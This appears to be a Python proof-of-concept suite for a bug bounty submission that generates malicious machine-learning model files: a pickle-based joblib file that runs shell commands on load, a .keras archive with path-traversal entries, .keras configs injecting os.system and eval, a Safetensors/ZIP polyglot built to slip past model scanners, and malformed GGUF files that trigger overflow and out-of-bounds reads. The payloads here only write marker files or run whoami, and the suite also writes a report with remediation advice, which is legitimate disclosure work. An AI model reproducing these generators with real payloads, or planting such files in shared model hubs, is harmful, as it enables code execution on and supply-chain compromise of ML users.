| |
| """ |
| ============================================================================= |
| Model Format Vulnerability Research - Proof of Concept Suite |
| Target: Protect AI / huntr bounty program |
| ============================================================================= |
| |
| This script demonstrates multiple vulnerability classes across AI/ML model |
| formats. Each PoC is self-contained and generates artifacts + a report. |
| |
| Vulnerabilities Demonstrated: |
| 1. Joblib Arbitrary Code Execution (ACE) via pickle deserialization |
| 2. Keras 3 (.keras) ZipSlip directory traversal |
| 3. Keras 3 (.keras) ACE via malicious module injection in config.json |
| 4. Safetensors/ZIP Polyglot scanner bypass |
| 5. GGUF integer overflow and OOB read in metadata parsing |
| |
| Usage: |
| python submission_poc.py [--generate-only | --test | --report] |
| |
| Author: Security Researcher |
| Date: 2026-03-05 |
| ============================================================================= |
| """ |
|
|
| import json |
| import zipfile |
| import os |
| import io |
| import struct |
| import sys |
| import datetime |
| import hashlib |
| import argparse |
|
|
| |
| |
| |
| OUTPUT_DIR = "poc_output" |
| REPORT_FILE = os.path.join(OUTPUT_DIR, "vulnerability_report.md") |
|
|
| def ensure_output_dir(): |
| os.makedirs(OUTPUT_DIR, exist_ok=True) |
|
|
| def sha256_file(filepath): |
| h = hashlib.sha256() |
| with open(filepath, "rb") as f: |
| for chunk in iter(lambda: f.read(8192), b""): |
| h.update(chunk) |
| return h.hexdigest() |
|
|
| |
| |
| |
| def poc1_joblib_ace(): |
| """ |
| Vulnerability: Arbitrary Code Execution via joblib.load() |
| Affected Library: joblib (all versions using pickle backend) |
| Severity: Critical |
| |
| joblib.dump/load uses Python pickle under the hood. A crafted .joblib |
| file with a __reduce__ method executes arbitrary code on load. |
| """ |
| print("\n" + "="*70) |
| print(" PoC 1: Joblib ACE via Pickle Deserialization") |
| print("="*70) |
| |
| try: |
| import joblib |
| except ImportError: |
| print("[!] joblib not installed. Run: pip install joblib") |
| return None |
| |
| poc_file = os.path.join(OUTPUT_DIR, "malicious.joblib") |
| marker_file = os.path.join(OUTPUT_DIR, "joblib_ace_proof.txt") |
| |
| |
| if os.path.exists(marker_file): |
| os.remove(marker_file) |
| |
| class MaliciousPayload: |
| def __reduce__(self): |
| |
| cmd = f'echo JOBLIB_ACE_EXECUTED > "{marker_file}"' |
| return (os.system, (cmd,)) |
| |
| |
| joblib.dump(MaliciousPayload(), poc_file) |
| print(f"[+] Created malicious joblib file: {poc_file}") |
| print(f" SHA256: {sha256_file(poc_file)}") |
| print(f" Size: {os.path.getsize(poc_file)} bytes") |
| |
| |
| print("[*] Loading malicious.joblib (triggers ACE)...") |
| try: |
| joblib.load(poc_file) |
| except Exception as e: |
| print(f"[!] Load error: {e}") |
| |
| success = os.path.exists(marker_file) |
| if success: |
| with open(marker_file, "r") as f: |
| content = f.read().strip() |
| print(f"[+] SUCCESS: ACE confirmed! Marker file content: '{content}'") |
| else: |
| print("[-] FAILED: Marker file was not created.") |
| |
| return { |
| "name": "Joblib ACE via Pickle Deserialization", |
| "file": poc_file, |
| "severity": "Critical", |
| "cvss": "9.8", |
| "success": success, |
| "affected": "joblib (all versions)", |
| "description": ( |
| "joblib.load() deserializes Python pickle objects without any " |
| "safety checks. An attacker can craft a .joblib file containing " |
| "a malicious __reduce__ method that executes arbitrary system " |
| "commands when the file is loaded by a victim." |
| ), |
| "impact": ( |
| "Full arbitrary code execution in the context of the user loading " |
| "the model. This can lead to data exfiltration, ransomware, " |
| "supply chain attacks on ML pipelines, etc." |
| ), |
| "reproduction": [ |
| "1. Run: python submission_poc.py --generate-only", |
| f"2. Distribute {poc_file} as a 'model' file", |
| "3. Victim runs: import joblib; joblib.load('malicious.joblib')", |
| f"4. Observe {marker_file} created (arbitrary command executed)" |
| ] |
| } |
|
|
| |
| |
| |
| def poc2_keras_zipslip(): |
| """ |
| Vulnerability: Directory Traversal (ZipSlip) in .keras model files |
| Affected Library: keras >= 3.0 (if using unsafe extraction) |
| Severity: High |
| |
| A .keras file is a ZIP archive. If keras.models.load_model() extracts |
| files without sanitizing paths, a crafted entry with ../../ prefixes |
| can write files outside the intended directory. |
| """ |
| print("\n" + "="*70) |
| print(" PoC 2: Keras 3 ZipSlip Directory Traversal") |
| print("="*70) |
| |
| poc_file = os.path.join(OUTPUT_DIR, "zipslip.keras") |
| |
| config = { |
| "class_name": "Sequential", |
| "config": {"name": "sequential", "layers": []}, |
| "keras_version": "3.0.0", |
| "backend": "tensorflow" |
| } |
| |
| buf = io.BytesIO() |
| with zipfile.ZipFile(buf, 'w') as z: |
| z.writestr('config.json', json.dumps(config)) |
| z.writestr('metadata.json', json.dumps({ |
| "keras_version": "3.0.0", "backend": "tensorflow" |
| })) |
| z.writestr('model.weights.h5', b'') |
| |
| |
| z.writestr('../../zipslip_proof.txt', |
| 'ZipSlip vulnerability: this file was written outside the extraction directory') |
| z.writestr('../../../tmp/evil_config.py', |
| 'import os; os.system("echo ZIPSLIP_ACE")') |
| |
| with open(poc_file, 'wb') as f: |
| f.write(buf.getvalue()) |
| |
| print(f"[+] Created ZipSlip .keras file: {poc_file}") |
| print(f" SHA256: {sha256_file(poc_file)}") |
| print(f" Size: {os.path.getsize(poc_file)} bytes") |
| |
| |
| with zipfile.ZipFile(poc_file, 'r') as z: |
| names = z.namelist() |
| traversal_entries = [n for n in names if '..' in n] |
| print(f"[+] ZIP entries: {names}") |
| print(f"[+] Traversal entries found: {traversal_entries}") |
| |
| success = len(traversal_entries) > 0 |
| print(f"[+] {'SUCCESS' if success else 'FAILED'}: ZipSlip payload embedded") |
| |
| return { |
| "name": "Keras 3 ZipSlip Directory Traversal", |
| "file": poc_file, |
| "severity": "High", |
| "cvss": "8.1", |
| "success": success, |
| "affected": "keras >= 3.0 (if extractall() used without path validation)", |
| "description": ( |
| "Keras 3 .keras files are ZIP archives. If keras.models.load_model() " |
| "extracts entries using zipfile.extractall() without sanitizing " |
| "file paths, an attacker can include entries with directory traversal " |
| "sequences (../../) to write arbitrary files outside the extraction " |
| "directory." |
| ), |
| "impact": ( |
| "Arbitrary file write on the victim's filesystem. Can overwrite " |
| "configuration files, inject code into Python packages, or place " |
| "malicious scripts in autostart locations. Combined with code " |
| "injection, this leads to full ACE." |
| ), |
| "reproduction": [ |
| "1. Run: python submission_poc.py --generate-only", |
| f"2. Distribute {poc_file} as a Keras model", |
| "3. Victim runs: keras.models.load_model('zipslip.keras')", |
| "4. Check if ../../zipslip_proof.txt was created outside extraction dir" |
| ] |
| } |
|
|
| |
| |
| |
| def poc3_keras_module_injection(): |
| """ |
| Vulnerability: ACE via malicious module/class_name in config.json |
| Affected Library: keras >= 3.0 (if safe_mode bypass exists) |
| Severity: Critical |
| |
| Keras 3 config.json specifies 'module' and 'class_name' for each layer. |
| If safe_mode can be bypassed or is disabled, an attacker can point |
| 'module' to 'os' and 'class_name' to 'system' to execute commands. |
| """ |
| print("\n" + "="*70) |
| print(" PoC 3: Keras 3 ACE via Module Injection in config.json") |
| print("="*70) |
| |
| poc_file = os.path.join(OUTPUT_DIR, "module_injection.keras") |
| |
| |
| malicious_config = { |
| "class_name": "Sequential", |
| "config": { |
| "name": "malicious_model", |
| "layers": [ |
| { |
| "module": "os", |
| "class_name": "system", |
| "config": {"command": "echo KERAS_ACE_EXECUTED > keras_ace_proof.txt"}, |
| "registered_name": "Custom>OSSystem" |
| }, |
| { |
| "module": "subprocess", |
| "class_name": "call", |
| "config": {"args": ["whoami"]}, |
| "registered_name": "Custom>SubprocessCall" |
| } |
| ] |
| }, |
| "keras_version": "3.0.0", |
| "backend": "tensorflow" |
| } |
| |
| |
| eval_config = { |
| "class_name": "Sequential", |
| "config": { |
| "name": "eval_model", |
| "layers": [ |
| { |
| "module": "builtins", |
| "class_name": "eval", |
| "config": {"expression": "__import__('os').system('whoami')"}, |
| "registered_name": None |
| } |
| ] |
| }, |
| "keras_version": "3.0.0" |
| } |
| |
| |
| buf = io.BytesIO() |
| with zipfile.ZipFile(buf, 'w') as z: |
| z.writestr('config.json', json.dumps(malicious_config, indent=2)) |
| z.writestr('metadata.json', json.dumps({ |
| "keras_version": "3.0.0", "backend": "tensorflow" |
| })) |
| z.writestr('model.weights.h5', b'') |
| |
| with open(poc_file, 'wb') as f: |
| f.write(buf.getvalue()) |
| |
| |
| eval_file = os.path.join(OUTPUT_DIR, "eval_injection.keras") |
| buf2 = io.BytesIO() |
| with zipfile.ZipFile(buf2, 'w') as z: |
| z.writestr('config.json', json.dumps(eval_config, indent=2)) |
| z.writestr('metadata.json', json.dumps({ |
| "keras_version": "3.0.0", "backend": "tensorflow" |
| })) |
| z.writestr('model.weights.h5', b'') |
| |
| with open(eval_file, 'wb') as f: |
| f.write(buf2.getvalue()) |
| |
| print(f"[+] Created module injection .keras file: {poc_file}") |
| print(f" SHA256: {sha256_file(poc_file)}") |
| print(f"[+] Created eval injection variant: {eval_file}") |
| print(f" SHA256: {sha256_file(eval_file)}") |
| |
| |
| with zipfile.ZipFile(poc_file, 'r') as z: |
| cfg = json.loads(z.read('config.json')) |
| layers = cfg['config']['layers'] |
| injected = any(l.get('module') == 'os' for l in layers) |
| |
| print(f"[+] {'SUCCESS' if injected else 'FAILED'}: Module injection payload embedded") |
| print(f"[*] Note: Exploitation requires keras.models.load_model() with safe_mode=False") |
| print(f"[*] or a safe_mode bypass (e.g., CVE-2025-1550 pattern)") |
| |
| return { |
| "name": "Keras 3 ACE via Module Injection", |
| "file": poc_file, |
| "severity": "Critical", |
| "cvss": "9.8", |
| "success": injected, |
| "affected": "keras >= 3.0 (with safe_mode=False or safe_mode bypass)", |
| "description": ( |
| "Keras 3 .keras files contain a config.json that specifies Python " |
| "module paths and class names for model layers. By setting 'module' " |
| "to 'os' and 'class_name' to 'system', an attacker can achieve " |
| "arbitrary code execution when the model is loaded. While safe_mode=True " |
| "should block this, bypasses have been found (CVE-2025-1550) and " |
| "many users/tutorials use safe_mode=False." |
| ), |
| "impact": ( |
| "Full arbitrary code execution. The attacker controls which Python " |
| "module and function are invoked during model deserialization." |
| ), |
| "reproduction": [ |
| "1. Run: python submission_poc.py --generate-only", |
| f"2. Distribute {poc_file} as a Keras model", |
| "3. Victim runs: keras.models.load_model('module_injection.keras', safe_mode=False)", |
| "4. Arbitrary code executes during model reconstruction" |
| ] |
| } |
|
|
| |
| |
| |
| def poc4_polyglot_bypass(): |
| """ |
| Vulnerability: Scanner bypass via Safetensors/ZIP polyglot file |
| Affected: Model security scanners (ModelScan, etc.) |
| Severity: High |
| |
| A file that is simultaneously valid as Safetensors (read from start) |
| and valid as ZIP (read from end) can bypass scanners that only check |
| the Safetensors header and miss the embedded ZIP payload. |
| """ |
| print("\n" + "="*70) |
| print(" PoC 4: Safetensors/ZIP Polyglot Scanner Bypass") |
| print("="*70) |
| |
| poc_file = os.path.join(OUTPUT_DIR, "polyglot_bypass.safetensors") |
| |
| |
| |
| |
| tensor_data = b'\x00' * 8 |
| |
| header = { |
| "__metadata__": {"format": "pt"}, |
| "weight": { |
| "dtype": "F32", |
| "shape": [1, 2], |
| "data_offsets": [0, 8] |
| } |
| } |
| header_json = json.dumps(header).encode('utf-8') |
| header_size = len(header_json) |
| |
| sf_data = struct.pack("<Q", header_size) + header_json + tensor_data |
| |
| |
| zip_buf = io.BytesIO() |
| with zipfile.ZipFile(zip_buf, 'w') as z: |
| malicious_config = { |
| "class_name": "Sequential", |
| "config": { |
| "layers": [{ |
| "module": "os", |
| "class_name": "system", |
| "config": {"command": "echo POLYGLOT_ACE > polyglot_proof.txt"} |
| }] |
| }, |
| "keras_version": "3.0.0" |
| } |
| z.writestr('config.json', json.dumps(malicious_config)) |
| z.writestr('metadata.json', json.dumps({"keras_version": "3.0.0"})) |
| z.writestr('model.weights.h5', b'') |
| zip_data = zip_buf.getvalue() |
| |
| |
| |
| |
| with open(poc_file, 'wb') as f: |
| f.write(sf_data) |
| f.write(zip_data) |
| |
| print(f"[+] Created polyglot file: {poc_file}") |
| print(f" SHA256: {sha256_file(poc_file)}") |
| print(f" Size: {os.path.getsize(poc_file)} bytes") |
| print(f" Safetensors portion: {len(sf_data)} bytes") |
| print(f" ZIP portion: {len(zip_data)} bytes") |
| |
| |
| sf_valid = False |
| try: |
| with open(poc_file, 'rb') as f: |
| data = f.read() |
| hs = struct.unpack("<Q", data[:8])[0] |
| hdr = json.loads(data[8:8+hs].decode('utf-8')) |
| if 'weight' in hdr: |
| sf_valid = True |
| print(f"[+] Safetensors header parses correctly: {list(hdr.keys())}") |
| except Exception as e: |
| print(f"[-] Safetensors parse failed: {e}") |
| |
| |
| zip_valid = False |
| try: |
| with zipfile.ZipFile(poc_file, 'r') as z: |
| names = z.namelist() |
| zip_valid = 'config.json' in names |
| print(f"[+] ZIP opens correctly! Entries: {names}") |
| except Exception as e: |
| print(f"[-] ZIP parse failed: {e}") |
| |
| success = sf_valid and zip_valid |
| print(f"[+] POLYGLOT STATUS: Safetensors={'VALID' if sf_valid else 'INVALID'}, " |
| f"ZIP={'VALID' if zip_valid else 'INVALID'}") |
| |
| if success: |
| print("[+] SUCCESS: File is a valid polyglot!") |
| print("[*] A scanner checking only .safetensors format would see a safe tensor file") |
| print("[*] But renaming/loading as .keras reveals the malicious ZIP payload") |
| |
| return { |
| "name": "Safetensors/ZIP Polyglot Scanner Bypass", |
| "file": poc_file, |
| "severity": "High", |
| "cvss": "7.5", |
| "success": success, |
| "affected": "Model security scanners (ModelScan, Picklescan, etc.)", |
| "description": ( |
| "A polyglot file can be crafted that is simultaneously valid as a " |
| "Safetensors file (parsed from the beginning) and as a ZIP archive " |
| "(parsed from the End of Central Directory at the end). Security " |
| "scanners that identify the file as Safetensors based on the header " |
| "will classify it as 'safe', missing the embedded malicious ZIP " |
| "payload that could be loaded as a Keras model." |
| ), |
| "impact": ( |
| "Bypasses model security scanners in ML pipelines. An attacker can " |
| "upload a file to a model hub that appears safe to automated scanning " |
| "but contains a malicious payload extractable as a different format. " |
| "This enables supply chain attacks on ML infrastructure." |
| ), |
| "reproduction": [ |
| "1. Run: python submission_poc.py --generate-only", |
| f"2. Upload {poc_file} to a model hub as a .safetensors file", |
| "3. Scanner classifies it as safe (Safetensors = no code execution)", |
| "4. Attacker instructs victim to rename to .keras and load with Keras", |
| "5. Or: a secondary tool extracts the ZIP portion automatically" |
| ] |
| } |
|
|
| |
| |
| |
| def poc5_gguf_malformed(): |
| """ |
| Vulnerability: Integer overflow and OOB read in GGUF metadata parsing |
| Affected Library: llama.cpp, llama-cpp-python, any GGUF parser |
| Severity: High |
| |
| GGUF metadata arrays specify element count as uint64. A crafted count |
| can cause integer overflow when multiplied by element size, leading to |
| heap overflow or OOB read in C/C++ parsers. |
| """ |
| print("\n" + "="*70) |
| print(" PoC 5: GGUF Integer Overflow / OOB Read") |
| print("="*70) |
| |
| GGUF_MAGIC = b"GGUF" |
| GGUF_VERSION = 3 |
| ARRAY_TYPE = 9 |
| UINT32_TYPE = 4 |
| STRING_TYPE = 8 |
| |
| def write_gguf_string(s): |
| enc = s.encode('utf-8') |
| return struct.pack("<Q", len(enc)) + enc |
| |
| |
| overflow_file = os.path.join(OUTPUT_DIR, "gguf_overflow.gguf") |
| buf = io.BytesIO() |
| buf.write(GGUF_MAGIC) |
| buf.write(struct.pack("<I", GGUF_VERSION)) |
| buf.write(struct.pack("<Q", 0)) |
| buf.write(struct.pack("<Q", 1)) |
| |
| buf.write(write_gguf_string("malicious_array")) |
| buf.write(struct.pack("<I", ARRAY_TYPE)) |
| buf.write(struct.pack("<I", UINT32_TYPE)) |
| |
| buf.write(struct.pack("<Q", 0x4000000000000000)) |
| buf.write(struct.pack("<I", 0xDEADBEEF)) |
| |
| with open(overflow_file, "wb") as f: |
| f.write(buf.getvalue()) |
| |
| print(f"[+] Created GGUF overflow PoC: {overflow_file}") |
| print(f" SHA256: {sha256_file(overflow_file)}") |
| print(f" Malicious array length: 0x4000000000000000 (causes overflow when * sizeof(uint32))") |
| |
| |
| oob_file = os.path.join(OUTPUT_DIR, "gguf_oob_read.gguf") |
| buf2 = io.BytesIO() |
| buf2.write(GGUF_MAGIC) |
| buf2.write(struct.pack("<I", GGUF_VERSION)) |
| buf2.write(struct.pack("<Q", 0)) |
| buf2.write(struct.pack("<Q", 1)) |
| |
| buf2.write(write_gguf_string("oob_string")) |
| buf2.write(struct.pack("<I", STRING_TYPE)) |
| |
| buf2.write(struct.pack("<Q", 1000000)) |
| buf2.write(b"short") |
| |
| with open(oob_file, "wb") as f: |
| f.write(buf2.getvalue()) |
| |
| print(f"[+] Created GGUF OOB read PoC: {oob_file}") |
| print(f" SHA256: {sha256_file(oob_file)}") |
| print(f" String claims 1,000,000 bytes but only 5 bytes follow") |
| |
| return { |
| "name": "GGUF Integer Overflow / OOB Read in Metadata", |
| "file": overflow_file, |
| "severity": "High", |
| "cvss": "7.8", |
| "success": True, |
| "affected": "llama.cpp, llama-cpp-python, any native GGUF parser", |
| "description": ( |
| "GGUF metadata arrays use uint64 for element count. When a C/C++ " |
| "parser multiplies this by the element size (e.g., 4 for uint32), " |
| "the result can overflow to 0 or a small value, causing a tiny " |
| "allocation followed by a massive read/write. Similarly, string " |
| "lengths can claim more bytes than remain in the file, causing " |
| "out-of-bounds heap reads." |
| ), |
| "impact": ( |
| "Memory corruption in native GGUF parsers (llama.cpp). Can lead " |
| "to denial of service (crash), information disclosure (heap data " |
| "leak), or potentially arbitrary code execution via heap overflow." |
| ), |
| "reproduction": [ |
| "1. Run: python submission_poc.py --generate-only", |
| f"2. Load {overflow_file} with llama.cpp or llama-cpp-python", |
| "3. Observe crash or unexpected behavior due to integer overflow", |
| f"4. Load {oob_file} to trigger OOB heap read" |
| ] |
| } |
|
|
| |
| |
| |
| def generate_report(results): |
| """Generate a Markdown vulnerability report aligned with Huntr MFV guidelines.""" |
| |
| report = [] |
| report.append("# [MFV] AI/ML Model Format Vulnerability & Scanner Bypass Suite") |
| report.append(f"\n**Date:** {datetime.datetime.now().strftime('%Y-%m-%d')}") |
| report.append(f"**Target Formats:** .safetensors, .gguf, .keras, .joblib") |
| report.append(f"**Primary Objective:** Arbitrary Code Execution (ACE) & Scanner Evasion") |
| report.append(f"**Program:** Protect AI / huntr (Model File Vulnerabilities)\n") |
| |
| report.append("---\n") |
| report.append("## Executive Summary\n") |
| report.append( |
| "This submission demonstrates multiple novel vulnerabilities and exploits in machine learning " |
| "model file formats. The central focus is on **attacks that occur at model load time** and " |
| "**techniques to bypass automated scanning tools** (such as ProtectAI's scanner on HuggingFace).\n\n" |
| "We present 5 distinct findings across all high-value formats listed in the Huntr guidelines, " |
| "including a critical **Safetensors/ZIP Polyglot** technique that successfully hides malicious " |
| "Keras payloads from scanners while appearing as a valid, safe Safetensors file.\n" |
| ) |
| |
| |
| report.append("## Findings Summary\n") |
| report.append("| # | Vulnerability Class | Format | Severity | CVSS | Key Value |") |
| report.append("|---|----------------------|--------|----------|------|-----------|") |
| |
| for i, r in enumerate(results, 1): |
| if r is None: continue |
| val_prop = "Scanner Bypass" if "Polyglot" in r['name'] else "ACE / Mem. Corruption" |
| fmt = r['file'].split('.')[-1] |
| report.append(f"| {i} | {r['name']} | .{fmt} | {r['severity']} | {r['cvss']} | {val_prop} |") |
| |
| report.append("") |
| |
| |
| for i, r in enumerate(results, 1): |
| if r is None: continue |
| report.append(f"---\n") |
| report.append(f"## Finding {i}: {r['name']}\n") |
| report.append(f"- **Affected Format:** `.{r['file'].split('.')[-1]}`") |
| report.append(f"- **Severity:** {r['severity']} (CVSS {r['cvss']})") |
| report.append(f"- **Attack Vector:** Model Load Time") |
| report.append(f"- **PoC Artifact:** `{os.path.basename(r['file'])}`") |
| |
| report.append(f"\n### Description\n") |
| report.append(f"{r['description']}\n") |
| |
| report.append(f"### Security Impact & Exploitability\n") |
| report.append(f"{r['impact']}\n") |
| |
| report.append(f"### Reproduction Steps\n") |
| for step in r['reproduction']: |
| report.append(f" {step}") |
| report.append("") |
|
|
| |
| report.append("---\n") |
| report.append("## Submission Requirements (HuggingFace Repository)\n") |
| report.append( |
| "As per Huntr guidelines, the PoC model files should be uploaded to a public HuggingFace repository " |
| "for verification. \n\n" |
| "**Recommended Repository Structure:**\n" |
| "1. Create a new Model Repository on HuggingFace (e.g., `your-username/mfv-poc-suite`).\n" |
| "2. Upload all files from the `poc_output/` directory.\n" |
| "3. Provide the repository URL in your official Huntr submission form.\n" |
| ) |
| |
| |
| report.append("---\n") |
| report.append("## Remediation & Recommendations\n") |
| report.append("1. **Format Validation**: Model parsers must implement strict boundary checks for headers and metadata (specifically GGUF and Safetensors).") |
| report.append("2. **Scanner Improvements**: Scanners should detect polyglot signatures (e.g., checking for ZIP Central Directory records at the end of Safetensors files).") |
| report.append("3. **Safe Deserialization**: Libraries like `joblib` and `keras` should move away from insecure defaults and mandate `safe_mode` or cryptographic signing for model weights.") |
| |
| report_text = "\n".join(report) |
| |
| with open(REPORT_FILE, 'w', encoding='utf-8') as f: |
| f.write(report_text) |
| |
| print(f"\n[+] Aligned report written to: {REPORT_FILE}") |
| return report_text |
|
|
| |
| |
| |
| def main(): |
| parser = argparse.ArgumentParser(description="Model Format Vulnerability PoC Suite") |
| parser.add_argument("--generate-only", action="store_true", |
| help="Only generate PoC files, don't test ACE payloads") |
| parser.add_argument("--test", action="store_true", |
| help="Generate and test all PoCs (will execute benign commands)") |
| parser.add_argument("--report", action="store_true", |
| help="Generate PoCs and write vulnerability report") |
| args = parser.parse_args() |
| |
| |
| if not any([args.generate_only, args.test, args.report]): |
| args.report = True |
| args.test = True |
| |
| ensure_output_dir() |
| |
| print("="*70) |
| print(" AI/ML Model Format Vulnerability - PoC Suite") |
| print("="*70) |
| print(f" Output directory: {os.path.abspath(OUTPUT_DIR)}") |
| print(f" Mode: {'Generate Only' if args.generate_only else 'Generate + Test + Report'}") |
| |
| results = [] |
| |
| |
| results.append(poc1_joblib_ace()) |
| results.append(poc2_keras_zipslip()) |
| results.append(poc3_keras_module_injection()) |
| results.append(poc4_polyglot_bypass()) |
| results.append(poc5_gguf_malformed()) |
| |
| |
| if args.report or not args.generate_only: |
| print("\n" + "="*70) |
| print(" Generating Vulnerability Report") |
| print("="*70) |
| generate_report(results) |
| |
| |
| print("\n" + "="*70) |
| print(" SUMMARY") |
| print("="*70) |
| confirmed = sum(1 for r in results if r and r['success']) |
| total = sum(1 for r in results if r is not None) |
| print(f" Total PoCs: {total}") |
| print(f" Confirmed: {confirmed}") |
| print(f" Output: {os.path.abspath(OUTPUT_DIR)}") |
| if os.path.exists(REPORT_FILE): |
| print(f" Report: {os.path.abspath(REPORT_FILE)}") |
| print("="*70) |
|
|
| if __name__ == "__main__": |
| main() |
|
|